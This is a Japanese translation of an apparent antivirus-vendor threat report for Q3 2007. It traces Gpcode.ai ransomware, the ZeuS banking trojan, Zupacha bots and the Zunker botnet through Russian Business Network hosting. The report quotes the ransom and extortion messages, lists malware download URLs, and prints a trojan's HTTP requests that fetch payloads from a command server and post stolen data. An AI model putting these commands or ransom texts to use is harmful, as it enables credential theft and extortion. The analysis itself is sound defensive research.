全世界で猛威を振るったMydoomや Lovesanを記憶している人々にとって、際限なく続くトロイの木馬の断続的な波は、ある種「退屈」とも言える日常と化し、新たなウイルスライターの活動は影をひそめたかのような錯覚を起こします。しかし現実には、サイバー犯罪がより高度で巧妙になった事を示し、より表面化しにくくする「努力」が実っていると言えます。ウイルスが大発生して被害が表面化すれば、必然的に取り締まり機関が捜査を行うことになります。したがって、「前線で」活動している者は、より耳目を引かないことに細心の注意を払っています。もともと、サイバー犯罪の世界では革新的な技術はそう多くありません。犯罪グループの活動および使用される技術のメカニズムは、かなり前に形成されたものがそのまま現在も有効なのです。

しかし、より多くの収益をあげようとする「欲望」が、ウイルスライターのお粗末な技術レベルと合わさるという、サイバー犯罪スキームの弱点が露見すると、世間の注目を集め、メディアによって白日の下にさらされる結果を招きます。

従って表面的なサイバー犯罪の歴史における2007年第3四半期は、ユーザ情報の盗難事件の増加や一連の脅迫型トロイの木馬の発生、一般のユーザにもその名が知れ渡るようになったRussian Business Network (RBN) が提供する「bulletproof」ホスティングサイト(一般のホスティングサービスでは禁止されている迷惑メール送信や、オンラインカジノ、アダルトコンテンツの提供などを規制しない、自由度の高いホスティングサービス)に代表される「世界規模のハッカー攻撃の温床」が、その特徴と言えるでしょう。

しかしその裏で、Zhelatinワーム (StormWorm)に関連するボットネットが急増している事実は、「ストームボットネット」が約200万台のマシーンを感染させたことを大きく報道したメディアでさえ無関心であったため、世間の注目を集めることはありませんでした。

犯罪者と取り締まり機関との「サイバー犯罪戦争」の真の前線は、マスコミの関与しない別次元にあったと言えるでしょう。

しかし第3四半期にメディアにも取り上げられた事件のいくつかは我々の注意を引き、調査を進めると、別の驚くべき他の事件が浮かび上がってきました。この事件は、外側から見たのでは、それまでに取り上げられてきた事件とはまるで無関係のようで、まさに発生したばかりだったのです。

この四半期レポートは、ある意味で特殊な内容となります。この3か月の間に発生した全ての重要な事件をカバーするのはもちろん、ひとつの大規模な調査の結果の報告であると同時にアンチウイルスのエキスパートとして、どのような調査が必要なのか、どうように分析するのかということを示すものでもあります。

帰ってきた「暗号化エキスパート」

すでに1年以上、暗号型トロイの木馬は完全に影をひそめていました。ユーザの情報を暗号化する目的でRSAアルゴリズムが使用されたGpcodeとアンチウイルスベンダとの闘争については、Kaspersky Labのレポート「脅迫者(Blackmailer)」で紹介していますが、その中でこのようなプログラムは今後増加するだろうと予測しました。しかし、暗号技術を悪用したトロイの木馬が帰ってきたのは、それから約1年の時を経た2007年の7月でした。

7月13日ごろを起点に、文書、画像、圧縮ファイル、作業ファイルが開けなくなり、以下のような内容が記載されたread_me.txtファイルがシステム上に現れるとともに「ゴミデータ」になり果てたという報告があがるようになり始めました。

Hello, your files are encrypted with RSA-4096 algorithm
(http://en.wikipedia.org/wiki/RSA).
You will need at least few years to decrypt these files without our
software. All your private information for last 3 months were
collected and sent to us.
To decrypt your files you need to buy our software. The price is $300.
To buy our software please contact us at: xxxxxxx@xxxxx.com and provide us
your personal code -XXXXXXXXX. After successful purchase we will send
your decrypting tool, and your private information will be deleted
from our system.
If you will not contact us until 07/15/2007 your private information
will be shared and you will lost all your data.
Glamorous team

ユーザのPC上のデータは「RSA-4096アルゴリズムを用いて暗号化され、脅迫者グループが提供することができる専用のソフトを利用しなければ、暗号を解くのに数年の月日を要し、暗号化されたデータは、過去三ヶ月の間に作成され、脅迫者のもとに送信された個人情報であり、暗号化を解くソフトの値段は300USD（約36,000円）である」事を記したRead meテキストに記載されている連絡先のEメールアドレスは、LdPinchやBanker トロイの木馬の亜種にも見られるもので、明らかにロシアにルーツをもつものでした。

Kaspersky Labで暗号ファイルを分析したところ、ウイルスライターはメッセージの内容に反して、RSA-4096ではなく、RC4アルゴリズムを使用していることが判明したため、その後の問題解決が容易になりました。脅迫型トロイの木馬の発見から24時間以内に暗号コードを解読することに成功し、ファイルの暗号解読手段をアンチウイルス定義データベースに追加することができました。

調査の課程でこの新しいGpcodeはファイルの暗号化を行う以外に、感染コンピュータ上の個人情報の収集および犯罪者のサーバへの転送、サーバからのファイルのダウンロード機能を持ち合わせていることが判明しました。

Gpcode.aiと命名されたこの脅迫型トロイの木馬の危険性を高レベルと判断し、さらに詳しく調査することにしました。その結果予想外の事実が判明したのです。

Gpcode.aiをたどって

調査は下記3つの主題を元に行われました：

トロイの木馬が情報を転送し、ファイルをダウンロードしたサーバ (http://martin-golf.net)
感染PCに置かれたメッセージ本文に記載されたEメールアドレス
トロイの木馬のボディに組み込まれているテキスト - ≪_SYSTEM_64AD0625_≫(トロイの木馬ライターがコンピュータメモリ上での位置を特定するために作成した特定行)

1. サーバ

まずGpcode.aiはs.php.スクリプトによってサーバに接続し、ユーザのコンピュータからどのような情報を取得すべきか(各種オンラインバンキングや支払いシステムへのアクセス用アカウント)という指示が暗号化されて記載されているファイルcfg.binをダウンロードします。

同様の調査は他の多くのアンチウイルスベンダでも行われましたが、唯一犯罪者のサーバ上に494の感染コンピュータから転送されたファイルを発見したPrevX社（代表取締役Mel Morris)のみが、American Airlines、Booz Allen Hamilton、米国務省といった被害者のリストを実名で報告しています。名前を公表されたどの組織も独自のコメントは控えています。

他のアンチウイルスベンダはPrevXの行動を肯定的には捉えませんでした。Trend Micro社のDavid Parryは、「ビジネスマナーの観点からも、PrevXがこの種の情報を公開したというのはやっかいなことです」とコメントしています。他の主要アンチウイルスベンダ各社が、自社のウイルス定義データベースから犯罪者を特定するあらゆるデータ(サーバアドレスやEメール)を削除することで、情報の流出を回避しているのに対し、PrevXは全世界に対して、盗まれたファイルの所在および所属先をアナウンスしたのでした。

このため犯罪者のサーバであるmartin-golf.netへは、セキュリティ専門家やハッカー、各国の取締り機関、野次馬などのアクセスが集中して、調査が難航するまま、犯罪者が手を引き、調査する側がお互いを調査し合うという無駄なものに終わりました。

上述の理由から、サーバには期待できないことが判明したため、調査の対象をEメールに変更しました。

2. Eメール

我々が関心を持ったのは、犯罪者と犠牲者のコンタクトです。具体的には、犯罪者とのコンタクトに踏み切り、データ復旧のために支払いを行った犠牲者と犯罪者がどのようなやりとりをしたのかということです。我々は試しにトロイの木馬に示されたメールアドレスのひとつにメールを送ることにしました。「私は一般事務員のジョン・ブラウンと申します。私の重要書類が暗号化されてしまいました。その書類は緊急の報告に必要なものなのです。報告を提出しないと、私はボスに殺されてしまいます。」翌日、未知の犯罪者から連絡がありました。

Sorry for delay.
Please transfer $500 to e-gold account 4616329 and send us a e-mail to
address oxyglamour@gmail.com. You can buy e-gold with paypal with help of
exchange site listed on official e-gold site (http://www.e- gold.com/unsecure/links.htm#marketmaker).
After that, we will send your personal decoding program immediately

まもなく送られてきたメールには、Read_meテキストに記載されていた要求金額(300米ドル)を値上げし500米ドルを要求してきました。送金方法には、サイバー犯罪者が好んで用いるe-goldが用いられています。返信にはe-goldの送金先アカウントも記載されていました。

このテーマに関しては、これ以上の調査を続ける必要がないため、次の調査に移りました。

3. 文字列 ≪_SYSTEM_64AD0625_≫

最後のテーマは≪Glamorous team≫と名付けられた犯行グループが他にどんなマルウェアを作成しているのかを特定することです。我々は既存のウイルスリストの中から≪_SYSTEM_64AD0625_≫ という文字列を探し出すことに着手しました。

結果は我々の予想に反し、様々なトロイの木馬やスパイウェア、バックドアから同じ文字列が見つかりました。

これら文字列が見つかったすべてのサンプルに共通する特徴は、ntos.exeという名前でシステムにインストールされるファイルで、Gpcode.ai と同じものでした。その中には、sporder.dllやrsvp322.dllが含まれており、Windowsディレクトリに、audio.dllやvideo.dllを含むwsnpoemというディレクトリが作成されます。

抽出したファイルの詳細分析では、特定の文字列だけでなく、コード全体の80％以上の類似が見られました。

「ユニバーサル」コード

我々はある種の「ユニバーサル」コードに遭遇しました。その機能としては、情報搾取もさることながら、新たなトロイの木馬をシステムにダウンロードすることも意図されており、それはボット機能や感染コンピュータをゾンビネットワークに接続させることができるのです。

「ユニバーサル」コードをベースとして作成されたマルウェアは、種々のプログラムを変更させることができる、単一かつ小型（一般のファイルの大きさと比較して）の特異な機能を持っています。興味深いことに、そのようなプログラムのいくつかは、2006年末にはすでに発見されていました。この「ユニバーサル」コードがGpcode.aiの「暗号」作成のために使用されました。

調査の結果、解明されたマルウェアの相関図を以下に挙げます。

悪質な企業

調査の次の段階は、「ユニバーサル」コードに含まれているリンクの分析です。我々はサンプルから検知時系列的にもっとも新しいものの中から、「活動期間」中に使用された4つのリンクを抽出しました。

http://81.95.149.28/logo/zeus.exe
http://81.95.149.28/logo/zupa.exe
http://myscreensavers.info/zupa.exe
http:/81.95.149.28/logo/fout.php

このトロイの木馬は何をしでかしたのでしょうか？はじめにこのプログラムもntos.exeを作成し、その後、ボットネットで認証するためにfout.php (http:/81.95.149.28/logo/fout.php)スクリプトに接続して、zeus.exe (http://81.95.149.28/logo/zeus.exe)とzupa.exe (http://81.95.149.28/logo/zupa.exe)ファイルをインストールしました。トロイの木馬は暗号化されたcfg.binコンフィギュレーションファイルをインストールしましたが、このファイルには、テキスト文書と他のサイトへのリンクがありました。マルウェアはネットワークへの接続をコントロールし始め、あらゆるフォーラムやゲストブック、ブログへのアクセスの際に、有害なリンクである(http://myscreensavers.info/zupa.exe)を含む独自のテキストを(cfg.binから)ユーザのテキストの最終部分に挿入してしまうのです。

同様の有害情報サンプル

検索サイトGoogleで類似例を探してみると、すぐに多くの情報がヒットしました:

このような攻撃スキームにより、トロイの木馬のライターは以前感染したコンピュータおよびそのユーザを介して、新たな悪意あるプログラムの拡散や感染コンピュータの増加を可能になります。今回のケースは、Eメールによる悪意あるプログラムの配信という伝統的手法の代わりに、最新のインターネット技術を利用している顕著な例です。

しかし、調査の対象となっているトロイの木馬は実際にどんな悪意あるプログラムを配布しているのでしょうか？その情報は非常に興味深いものでした：

リンク	インストールされる悪意あるプログラム
http://81.95.149.28/logo/zeus.exe	Trojan-Spy.Win32.Bancos.aam
http://81.95.149.28/logo/zupa.exe	Email-Worm.Win32.Warezov.dq
http://myscreensavers.info/zupa.exe	Trojan-Spy.Win32.Bzub.bm

これらは完全に異なるファミリーに属する悪意あるプログラムであり、一見お互い何の関連性もなく、別々のウイルスライターにより作成されたものと考えられていましたが、実際には同一のサイトの同一のトロイの木馬によりばらまかれているものでした。したがって、これらすべてはGpcode.aiの暗号エキスパートに何らかの形で関連があったのです。

状況は不可解であり、もしかすると何か世界的なシンジケートの一つのようなもので、これが最近の悪意あるプログラムの作成および大発生のほとんどのケースに関与していたのではないかという悲観的な考えも浮かび上がってきました。

Bzub により構築されたボットネットの分析を行うにつれて、我々の悪い予感は強まっていきました。Bzubの直径の亜種が、 ≪Zupacha≫ と名付けられたトロイの木馬であることが判明したのです。Bzub と Zupacha は同一のプログラムですが、Bzubがトロイの木馬のスパイ機能を有しているのに対して、Zupachaはそうではありません。

Bzub/Zupachaとは、Zunkerボットネットシステム下で活動するボットクライアントです。

Zunkerボットネットに接続し、そこで使用されるための独自の「インターフェイス」を有するもう一つのマルウェアは、Email-Worm.Win32.Zhelatin.bgです。これは、拡散のために最も洗練された技術を利用するもので、2007年初旬にEメールを介して大量に拡散しました。有名な「ストームワーム」の中でも非常に厄介なものの一つです。

ここまでで、Zhelatin、Warezov、Bancos.aam、Bzub さらには Gpcode.ai がそれぞれ何らかの関係にあることがわかりました。これらのプログラムはすべて、今日における最も活発で危険な系統に属する悪意あるプログラムであり、ntos.exe, video.dll, audio.dll, sporder.dll, lcewza.exe, filech.exe, filede.exe, iphone.scr, ldr.exe, ldr2.exe, loader.exe, pajero.exe, update92620748.exe, zeus.exe, zs1.exe は、世界中のウイルスアナリストによく知られています。

今回の調査は、一本の糸をたどり始めたところ、複雑にからまった糸の束にたどり着いたといえましょう。

我々が調査を行っている間に、未知の犯罪者が再び世間に姿を現しました。正確には、影を潜めていたつもりが、結果として耳目を集める事になったようです。

ブローカー

2007年7月25日の日中(Gpcode.aiが発見されてから１０日後)「カスペルスキー研究所」のアナリストにより新たな悪意あるプログラムの大発生が確認されました。被害者となったのは、ロシアの有名な情報サイト(utro.ru, gzt.ru, rbc.ru)にアクセスした人々です。

調査の過程で、utro.ru 上のバナーに、悪質なサイト(http://81.95.145.210/333/m00333/index.php)へのリンク(http://www.txt.utro.ru/cgi- bin/banner/rian?86028&options=FN)が設定されていることが判明しました。このリンクは悪名高いRBN (Russian Bussiness Network)のサーバにホスティングされたものです。

このページを開くと、ユーザのブラウザはエクスプロイトの攻撃を受けます(有名なMpackが利用されています)。攻撃が成功した場合、システムにトロイの木馬型ダウンローダがインストールされ、その際にベースとなる悪意のあるプログラムであるTrojan- Spy.Win32.Bancos.aam.が設定されます。

システム内にトロイの木馬が設定されると次のコマンドが実行されます：

Host: 81.95.149.66
GET /e1/file.php HTTP/1.1
GET /ldr1.exe HTTP/1.1
GET /cfg.bin HTTP/1.0
POST /s.php?1=april_002fdf3f&i= HTTP/1.0

これらの動作の結果として、ユーザの感染したシステム内に、既知のntos.exeが表れるのです：この名前のファイルはGpcode.aiをシステムにインストールする際に用いられています。最悪の場合、新しい「暗号化マルウェア」の出現を想定して、分析を続けました。

結局このウイルスはGpcodeとは別物であることが判明し、ロシアのQUIKシステムのユーザの個人情報を盗む目的で作成された最初のトロイの木馬型スパイウェアとして、Bancos.aamの名前で新たに登録されました。

QUIKとは、オンラインでの株取引システムへの接続に用いるプログラムです。インターネットを介しての株取引をインターネットトレーディングと呼びますが、QUIKはサーバ部分とクライアント(ターミナル)部分がインターネットを通して相互に通信しあうという構成になっています。

これまでウイルスライターがこれほど明確に株取引システムへのアクセスを攻撃目標にした前例はありません。オンラインバンキングのアカウント搾取は、以前からも多く見られましたが、株取引にはいささか疑問すら感じられます。

トロイの木馬はシステム内で、QUIK への接続パラメータ情報が保存されているsecring.txk, pubring.txk, qrypto.cfgを探し、それらを自身のサーバに転送する機能を持っています。

スパイウェアが実際にどんなファイルを必要としているのかを知り、我々は再び所有しているマルウェアリストの中から検索を始めると、さらに5種類のトロイの木馬の亜種が確認できました。そのうち始めに検知されたのは7月初旬です。これらすべてはBancos.aamから派生し、新たなTrojan-PSW.Win32.Broker ファミリーを形成します。

これらのトロイの木のコードはGpcode.ai と兄弟と言えるほど似ているでしょうか？両者の違いは一方はデータを盗み、他方はデータを暗号化する点に尽きます。ここで我々は再び「ユニバーサル」コードに直面しました。

中間報告

8月初旬までに我々が入手することのできた事実は以下の通りです：

Gpcode.aiは「ユニバーサル」コードに基づいており、martin-golf.netに関与してた。
Bancos.aamは、「ユニバーサル」コードに基づいており、 RBN (Russian Bussiness Network)がホスティングする「bulletproof」サーバからダウンロードされていた。
以前に発見されていたいくつかのZunkerボットネットは同様にRBNに基づいていた。
ZunkerボットネットはBancos.aam\Gpcode.aiなどの悪意あるプログラムをダウンロードするダウンローダのためのコントロールセンターだった。
Zunkerにより操作されうる悪意あるプログラムにはZupachaやBzubスパイウェア、またZhelatinワーム(Storm Worm)が含まる。
こうしたボットネットの一つは、Warezovワームの拡散にも利用されていた。

唯一わからなかったのは、頻繁かつ多岐におよぶ悪意あるプログラムを作成するために使用される「ユニバーサル」コードのライターが誰なのか、またこれらのケースすべてが同一のウイルスライターまたはグループにより行われたのかということです。

この点を追求するために、さまざまな「ハッカー」のサイトやフォーラム、特にロシア語のものを注意深く読むことに時間を費やすことになりました。状況はだんだんと明らかになってきました。

「ユニバーサル」コードを探して

ZunkerとZupacha

では、この間何を調査していたのでしょうか？ハッカーのサイトでは、ボットネットやボットクライアントによる操作センターであるZunkerとZupachaのセットが数多く売りに出されていました。これはすでに既知の事実でしたが唯一興味深かったのは、調査対象に関連しているボットシステムの未知のライターが要求している金額が3000ドルにまで上るということです。時には200ドル程度の非常に安いものもありましたが、恐らく既知のセットの転売に過ぎないでしょう。

ちなみに、すでにアクティブなボットネットのアドレスをもとにGoogle で検索を行うことで、我々が関心を抱いているZunkerとZupachaのファイルのすべてが無料で入手することができました。

Zupachaの全機能は、非常に印象深いもので、システムに他のファイルをダウンロードさせるだけでなく、自己拡散の機能を持ち合わせます。自己拡散の方法(フォーラム上でのメッセージに組み込むこと)については前述のとおりですが、Zupachaはさらに自身へのリンクを以下の方法で無差別配信させることもできたのです：

ICQ/Jabberスパム - 悪質なサイトへのリンクを含むテキストは、インスタントメッセンジャー上でユーザが相手と交換するメッセージに挿入されます。
Webスパム - テキストは、ユーザが記入するあらゆるウェブフォーラムに挿入され、主にフォーラムやウェブメール経由が多く見られます。
スパムメール - メールの本体にテキストが挿入されます。

注目すべき点として、Zupachaはいかなる状況でも上述の方法で自らメッセージの配信を行わないことが挙げられます。Zupachaはユーザの活動を制御し、自らのテキストをユーザが発信するあらゆるメッセージに対して追加しますが、ユーザ本人にはこれらの追加が見えないようになっています。これにより、感染の表面化を遅らせる事が可能となります。

しかしながら、Zupachaは情報を盗むことは行なわず、自己拡散する単なるトロイの木馬です。したがい、悪名高い「ユニバーサル」コードになることもないと思われます。

我々が関心を持っている問題に対する答えは、悪意あるプログラムのハッカーアプリケーションの分析により得られることができました：「数百種のBancos.aamやGpcode.ai、Brokerの亜種として使用されている「ユニバーサル」コードはZeuS(作者による命名)ボットであった。」

ZeuS - Zbot

ZeuSの亜種から得られた情報およびインターネット上での捜査活動により、ZeuSの全容がほぼ明らかになりました。

ボットはもとはといえば、すべての希望者に販売するためのものであり、特定の依頼主により管理されていました。ライター自身は、買い手に対する「テクニカルサポート」は行わず、他の人々に一切を任せていました。Gpcode.aiやBrokerが騒がれて直後、ウイルスライターはこれらのボットネットが取締り機関の注意を引く結果となったことに気付き、一つのサイトを介して販売を自粛する旨を表明しました。

c 作成者：gyg（guest） 日付2007年8月17日
　では、具体的に続けます。

　 ZeuSの新規販売は今後しません。既存顧客へのサポートは行います
　皆さんお達者で

　 AP

c 作成者：gyg（guest） 日付2007年8月17日
　 2マクス：
　販売にはもう興味がなくなりました、というのも、
　 1）利用方法もわかったし、最大限の利益も得ることができた
　 2）1)を達成できないできそこないに限って、ZeuSを転売しているようだから

　 2NeoN：
　＞殺すと脅しても無駄ですよ、そんな脅しには乗りません。

　そんなマジに受け止めないで。冗談に決まっているでしょ

　 good luck

このケースは昨年末の事件を思い出させるものです。具体的にはNordea銀行の個人情報盗難に関連した事件であり、トロイの木馬と類似の機能をもつNuclear Grabber(当時3000ドルで販売)が発生した際、ライターであるCorpseは記者のインタビューにも答えています。その後、Corpseは自らのサイトで「ビジネスから手を引く」こと、さらに、「流出したテキストはハードディスクと共に焼失した」ことを発表し、これ以上悪意あるプログラムの開発及びサポートを行わないことを宣言しました。

ZeuSのケースもそれによく似ています。7月末にライターは「ビジネスから手を引い」たにも関わらず、必要な機能を有したボットの亜種を作成することが可能なconstructorはハッカーの手元に残り、ボットの売買や拡散が続けられたのです。

当初 ZeuSには他のファイルをシステム内にダウンロードするという、十分に制限されたボット機能だけが組み込まれていましたが、次第に機能が追加されていきました。機能の追加は作者本人の手に依るのかあるいは別の「所有者」によって行われたものなのかは不明ですが、重要なことは、ZeuSに汎用「インターフェイス」が備わったことです。これによりZupachaと全く同じ方法でZunkerボットネットへの接続が可能となり、cfg.binファイルを介して手順を入手し、それをリアルタイムで実行することができるようになったのです。

我々は、暗号解析のプログラムを作成し、cfg.binファイルの解析を試みました。解読されたファイルにはたくさんのオンライン決済システムのアドレスが含まれている事が確認され、ボットネットの所有者が、ユーザの行動パターンの解析およびデータの搾取を目的として新たなターゲットのアドレスを次々と収集できたことが容易に予想されます。

ボット機能の中には、システムに自らをシステムにインストールする基本動作だけでなく、起動されたプロセスへのインジェクトや各種アンチウイルスアプリケーションに対抗する機能、socksおよびhttpプロクシサーバ機能、大規模な情報盗難機能を備えています：

トロイの木馬は、ユーザのパスワードが含まれているProtected Storageの内容を盗みます
Formgrabber。トロイの木馬はオンラインバンキング及び決済システムといったウェブフォームに入力されるあらゆる情報を搾取することができます。このようにして、アカウント情報の盗難が行われます
バーチャルキーボードの回避。トロイの木馬はマウスクリックのインターセプトや画面のスクリーンショットを入手する機能を持ちます
サイトやページのすり替え。これは非常に興味深い手法で、Nuclear Grabberにも用いられていました。ユーザがトロイの木馬により操作されているどこかのサイトにアクセスした際に、アクセス要求が偽のフィッシングサイトへリダイレクトされたり、もとのページに情報を入力するための新たなボックスが追加されたりします。ページの内容は直接ブラウザに反映される前にすり替えられてしまします
電子証明書の盗難

ZeuSの亜種をウイルスコレクションから速やかに見つけることができたのは、ZeuSがコンピュータメモリ上(_SYSTEM_)に自身の存在を認証するために作成するインディケータ (mutex)のおかげです。

例：

__SYSTEM__91C38905__
__SYSTEM__64AD0625__
__SYSTEM__23D80F10__
__SYSTEM__7F4523E5__
__SYSTEM__45A2F601__

この仕様を元にZbotファミリーを形成するすべてのZeuSの亜種を特定することに成功しました。

これが実際の「ユニバーサル」コードであり、独自の方法を数多く利用してあらゆる情報を盗んでいる張本人です。ここで最も危険なのは、Gpcode.aiのケースのように、修正が加えられるたびにいろいろな種類の機能が付加されていくことです。

三つの ≪Z≫

これですべてが明らかになりました。ロシア語圏のサイバー犯罪者は、Zupacha+ZeuSやそれらにより操作されるZunkerボットネットからなる、一種のスタンダードを作り出したと言えるでしょう。

これらの手段で構築されたゾンビネットワークの規模は驚くべきものです。Zunkerを基盤として構築された巨大ネットワークの一つは、発見された時点で既に106000台のコンピュータが接続され、1日1500台の勢いで拡大を続けていました。Zupachaがここまで拡散した理由は設定が簡単であったことやコントロールセンターの使用があげられます。

攻撃対象向けに個々にカスタマイズされたこれら２種のトロイの木馬(ZeuSとZupacha)は、初心者ですら簡単に購入することができ、サーバを借りてボットネットZunkerのコントロールパネルの設置をすませるだけで事が済みました。この際のホスティングサーバには、言わずと知れたRussian Business Networkが主に利用されています。RBNはここ半年間常に紙面を賑わし、西側諸国では「悪の巣窟」というイメージを持たれています。

我々が興味をひかれたのはRBN自体ではなく、利用していた顧客であり、またそのボットネットでした。探す物も場所も既に判明していたので、同様のシステムのいくつかは簡単に見つけることができました。(上記の図を参照)

Zunkerボットネットのうちいくつかは、「ストームワーム」であるZhelatinやWarezovのような危険なプログラムの大発生に関与していたのは確かです。Zunker+Zupachaを基盤としてこれらのボットネットが構築された可能性もありますが、もしかすると、彼らは単に所有者に代金を支払うことで、自らのワーム拡散を目的として既存のボットネット機能を「借りた」だけなのかも知れません。

特筆すべき点として、トロイの木馬Zupachaが西側のハッカーの手に渡った時、彼らはコンセプトに感動しつつ、それを分析してフォーラム(http://www.ryan1918.com)で論議を始めました。彼らは自分たちの使用目的に則したコードを持っていませんでしたが、コントロールセンターのアドレスをトロイの木馬のバイナリファイルに変換し、データベースを含め、トロイの木馬の設定を保存しているコントロールセンターを独自に作成しようとさえしたのです。その後、コントロールセンターとデータベースのコードが発見され、活動が加速していったのです。この活動(ロシアのトロイの木馬の分析や「ロシアンマフィアの武器」の使用)に関わった人は全員、Zupachaの拡散および知名度向上の一翼を担ったことになります。

まとめ

上記の情報の大部分は、ロシア語圏におけるサイバー犯罪界がどのような活動をして、またどのように相互関連しているかを報告したものです。特定のウイルスライターやそのグループがトロイの木馬を販売目的で作成し、購入者は場合によってはオリジナルとはまったく別物とも思えるほどのカスタマイズを施しています。感染したマシーンは時に何十万台という規模のボットネットを構成し、サイバー犯罪者が作成・売買するコントロールセンターに操作されていたのです。同じボットネットを利用してあらゆるマルウェアを拡散させることができ、競争も生まれました。またそれらの温床として、取締り機関やアンチウイルスベンダに対抗して、これらのボットネットがより長く機能することを目的としたサービスを、月額数十ドルから数万ドルまで様々な値段で提供する「bulletproof」ホスティングサーバが存在しているのです。

こうしたトロイの木の作成から配布を行うサービスは、「需要」に支えられるものであり、実際にこの「産業」は莫大な収益を上げています。当レポートはロシア語圏のハッカーグループの氷山の一角にすぎません。世界には当然他のグループも存在しています。発祥がどこであれ、すでに南米や中国、トルコその他にこの仕組みは手法や手段を変えながら着実な広がりを続けています。まさに「インターネットに国境はない」事を示しています。

まとめとして、今回のレポートの内容に関する2007年8月20日付けのCNEWSの報告を転載します。http://www.cnews.ru/news/line/index.shtml?2007/08/20/263041(露語)

同様の英語での報告は2007年8月17日付けのリンク先を参照してください。http://www.informationweek.com/news/showArticle.jhtml?articleID=201800958

≪トロイの木馬はInfostealerである。SecureWorks の報告によると、Prg Trojan, Ntos, Tcp Trojan, ZeuS, Banker.aam,としても知られているMonstresはこれまでに10万件以上の機密情報を盗み出しており、それらをMonsters.comサイトに転送している。

SecureWorksのDon Jackson 研究員は、ここまで多くの犠牲者が出た背景には、トロイの木馬が含まれた広告がMonstersのWebサイト自身に掲載されたことを挙げています。

トロイの木馬はWindowsのネットワーク通信を傍受し、情報を複製してMonsters.comに転送しており、その後盗んだものをあらかじめ定めたウェブサイトに送るのです。Informationweekの報告によると、専門家は4000～6000件の盗まれた情報がある12のサイトを発見したとのことです。またそれらのサイトのひとつは約1万件の情報が、最も大きなもので46000件にも上るものがあるということです。合計すると、それらのサイトには10万人もの情報が載せられていました。ジャクソン氏のコメントによると、盗難規模は少なく見積もっても自分が発見したものの4倍以上は存在するということです。」

これはどんなトロイの木馬だったのか、どのようにデータを盗んだのか、皆さんは恐らくピンときたことでしょう。もしかすると、どこに送られたかもわかったかもしれませんね。そうです、これはすべて例の「ユニバーサル」コード、ZeuSなのです。そして、これらの情報はすべてRBNに送られていたのでした。

Email:
　　お問い合わせはこちら
　　新しいウイルスはこちら

全ての脅威

ウイルス

ハッカー

スパムメール

今日の情報社会における脅威、2007年第３四半期